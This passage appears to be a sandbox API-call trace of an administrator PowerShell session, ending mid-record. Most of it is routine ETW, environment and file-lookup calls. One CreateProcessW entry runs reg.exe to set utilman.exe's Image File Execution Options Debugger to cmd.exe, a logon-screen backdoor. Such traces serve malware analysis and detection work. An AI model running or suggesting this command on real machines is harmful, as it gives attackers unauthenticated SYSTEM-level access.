EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.798] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x12, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.798] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.821] SetEvent (hEvent=0x898) returned 1 [0256.821] SetEvent (hEvent=0x880) returned 1 [0256.821] SetEvent (hEvent=0x890) returned 1 [0256.821] SetEvent (hEvent=0x894) returned 1 [0256.821] SetEvent (hEvent=0x8a8) returned 1 [0256.821] SetEvent (hEvent=0x89c) returned 1 [0256.821] SetEvent (hEvent=0x8a0) returned 1 [0256.821] SetEvent (hEvent=0x8a4) returned 1 [0256.821] SetEvent (hEvent=0x8b0) returned 1 [0256.821] SetEvent (hEvent=0x8ac) returned 1 [0256.822] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0256.828] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0256.834] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xc1ab339a, Data2=0xffbe, Data3=0x4bdb, Data4=([0]=0x88, [1]=0x80, [2]=0x1, [3]=0xf8, [4]=0x91, [5]=0x3, [6]=0xfe, [7]=0x8c))) returned 0x0 [0256.834] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=35186915931) returned 1 [0256.835] AmsiOpenSession () returned 0x0 [0256.835] AmsiScanString () returned 0x80070015 [0256.840] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=35187434842) returned 1 [0256.840] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0256.840] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.840] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x13, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.840] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.841] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.841] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.841] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.841] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="ሰғ") returned 0x0 [0256.841] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0256.842] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0256.842] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.842] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0256.843] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0256.843] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0256.843] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0256.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0256.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0256.844] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0256.844] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0256.844] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\REG.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0256.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0256.845] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0256.845] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0256.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0256.845] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0256.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0256.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0256.846] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0256.846] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0256.846] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\REG.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x709759b8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x709759b8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x709759b8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe800, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0x7e1bd60 [0256.846] FindNextFileW (in: hFindFile=0x7e1bd60, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.847] FindClose (in: hFindFile=0x7e1bd60 | out: hFindFile=0x7e1bd60) returned 1 [0256.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0256.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0256.847] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe")) returned 0x20 [0256.851] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1a, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.851] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.851] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1a, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1a, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0256.851] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0256.866] GetConsoleWindow () returned 0x302b8 [0256.868] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.869] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0256.869] CoTaskMemAlloc (cb=0x804) returned 0x7e29450 [0256.869] GetConsoleTitleW (in: lpConsoleTitle=0x7e29450, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0256.870] CoTaskMemFree (pv=0x7e29450) [0256.871] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e668*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4dbb8b8 | out: lpCommandLine="\"C:\\WINDOWS\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\" /f /v Debugger /t REG_SZ /d %windir%\\system32\\cmd.exe", lpProcessInformation=0x4dbb8b8*(hProcess=0x8f4, hThread=0x8f0, dwProcessId=0xa90, dwThreadId=0x710)) returned 1 [0256.894] CloseHandle (hObject=0x8f0) returned 1 [0256.894] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0256.894] GetCurrentProcess () returned 0xffffffff [0256.894] GetCurrentProcess () returned 0xffffffff [0256.895] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x8f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x8f0) returned 1 [0256.895] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x8f0, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0257.129] CloseHandle (hObject=0x8f0) returned 1 [0257.129] GetExitCodeProcess (in: hProcess=0x8f4, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0257.129] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0257.135] CloseHandle (hObject=0x8f4) returned 1 [0257.135] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1a, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.135] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1a, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.135] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.135] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x18, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.135] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.135] SetEvent (hEvent=0x8d4) returned 1 [0257.136] SetEvent (hEvent=0x8c8) returned 1 [0257.136] SetEvent (hEvent=0x8cc) returned 1 [0257.136] SetEvent (hEvent=0x8d0) returned 1 [0257.136] SetEvent (hEvent=0x8e4) returned 1 [0257.136] SetEvent (hEvent=0x8d8) returned 1 [0257.136] SetEvent (hEvent=0x8dc) returned 1 [0257.136] SetEvent (hEvent=0x8e0) returned 1 [0257.136] SetEvent (hEvent=0x8ec) returned 1 [0257.136] SetEvent (hEvent=0x8e8) returned 1 [0257.137] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0257.145] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0257.154] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0xe551d433, Data2=0x7e06, Data3=0x4bf1, Data4=([0]=0xb9, [1]=0xcf, [2]=0x1c, [3]=0xd2, [4]=0x6e, [5]=0xe8, [6]=0x24, [7]=0xbb))) returned 0x0 [0257.154] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=35218857485) returned 1 [0257.154] AmsiOpenSession () returned 0x0 [0257.154] AmsiScanString () returned 0x80070015 [0257.159] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=35219402882) returned 1 [0257.159] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0257.160] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.160] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x19, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.160] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.160] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.160] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1b, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.160] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1c, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.160] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="@") returned 0x0 [0257.161] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0257.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0257.162] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.162] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0257.162] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0257.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0257.162] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, 